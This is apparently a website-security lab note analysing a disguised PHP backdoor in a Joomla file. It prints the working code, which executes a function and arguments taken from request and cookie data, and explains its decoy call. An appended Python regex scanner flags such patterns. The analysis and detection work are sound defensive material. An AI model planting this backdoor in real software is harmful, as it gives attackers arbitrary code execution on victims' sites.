Fake Parameters Conceal a Backdoor

Labs Note

We found this backdoor in the middle of the logrss.php file that defined the JDocumentRendererRSS class.

...
function jregisterClass() {
    // merge arrays
    $info = array_merge($_REQUEST,$_COOKIE);

    // validate parameters
    if ( !isset($info['mlg']) ) die( 'Restricted access' );
    // function name and every argument come straight from the request/cookie data
    else $info['feed']($info['file'], $info['link'].'"'.$info['mlg'].'"'.$info['title'], $info['file'][1]);
}

/**
 * Pass the feed data
 *
 * @access public
 * @return string
 */
jregisterClass( 'onAfterStart', 'JDocumentRendererRSS' );

function JDocumentRendererRSSdata($data)
{
...

The code looks very natural until you check what it does.

jregisterClass( 'onAfterStart', 'JDocumentRendererRSS' );

This code looks like it registers the legitimate JDocumentRendererRSS class to be used after starting the application/plugin, right?

There really is an onAfterStart trigger for Joomla mambots, but it is used in a different context, and, more importantly, there is no standard jregisterClass function. However, that very file defines its own jregisterClass function (you can see this in the first snippet).

That function doesn't declare any parameters, though. It turns out that in PHP you can pass as many extra arguments as you want and the function will simply ignore the ones it does not expect. So the 'onAfterStart', 'JDocumentRendererRSS' arguments are just a red herring.

The function itself is a classic backdoor. It takes the function name and its arguments from cookie values and GET/POST parameters, so it can execute arbitrary PHP code chosen by the attacker.

This type of backdoor is very easy to miss when you manually inspect the files. That's why integrity control monitoring is very important. It helps you identify modified files and, in the best cases, shows exactly what has been changed.
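As an added example (not code from the original post or from the site's tooling), here is a small Python scanner that flags the three traits this backdoor shows: input taken from request superglobals, a variable used as the function name, and a call that passes arguments to a function declared without any. The PHP sample it runs over is a constructed imitation of the snippet above, not the real logrss.php.

```python
import re

# Constructed sample modelled on the snippet discussed above (not the original file).
SAMPLE_PHP = r'''<?php
function jregisterClass() {
    $info = array_merge($_REQUEST,$_COOKIE);
    if ( !isset($info['mlg']) ) die( 'Restricted access' );
    else $info['feed']($info['file'], $info['link'].'"'.$info['mlg'].'"'.$info['title'], $info['file'][1]);
}
jregisterClass( 'onAfterStart', 'JDocumentRendererRSS' );
function JDocumentRendererRSSdata($data) { return $data; }
'''

# A variable (optionally indexed) used as the callee: $x(...) or $x['k'](...)
VARIABLE_CALL = re.compile(r"\$\w+(?:\[[^\]]*\])*\s*\(")
# Direct use of attacker-controlled request data
SUPERGLOBAL = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")
# "function name()" with an empty parameter list
EMPTY_PARAM_FUNC = re.compile(r"function\s+(\w+)\s*\(\s*\)")


def scan_php(source):
    """Return (line_number, reason) findings for the given PHP source text."""
    findings = []
    empty_param_funcs = set(EMPTY_PARAM_FUNC.findall(source))
    for n, line in enumerate(source.splitlines(), 1):
        if VARIABLE_CALL.search(line):
            findings.append((n, "variable function call"))
        if SUPERGLOBAL.search(line):
            findings.append((n, "request-controlled input"))
        for name in empty_param_funcs:
            # A call site that hands arguments to a function declaring none
            # (PHP silently accepts the extra arguments, as the post explains).
            is_call = re.search(r"\b" + re.escape(name) + r"\s*\(\s*[^)\s]", line)
            is_decl = re.search(r"function\s+" + re.escape(name) + r"\b", line)
            if is_call and not is_decl:
                findings.append((n, f"{name}() called with arguments but declares none"))
    return findings


if __name__ == "__main__":
    for line_no, reason in scan_php(SAMPLE_PHP):
        print(f"line {line_no}: {reason}")
```

The patterns are deliberately simple regexes, so treat hits as triage leads to confirm against a known-good copy of the file rather than as proof of compromise.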

If you’re having difficulty identifying malicious code on your website, our team can help.
